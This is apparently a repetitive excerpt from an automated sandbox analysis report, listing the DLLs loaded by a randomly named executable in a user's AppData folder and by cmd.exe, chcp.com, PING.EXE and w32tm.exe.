Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe	Section loaded: wldp.dll
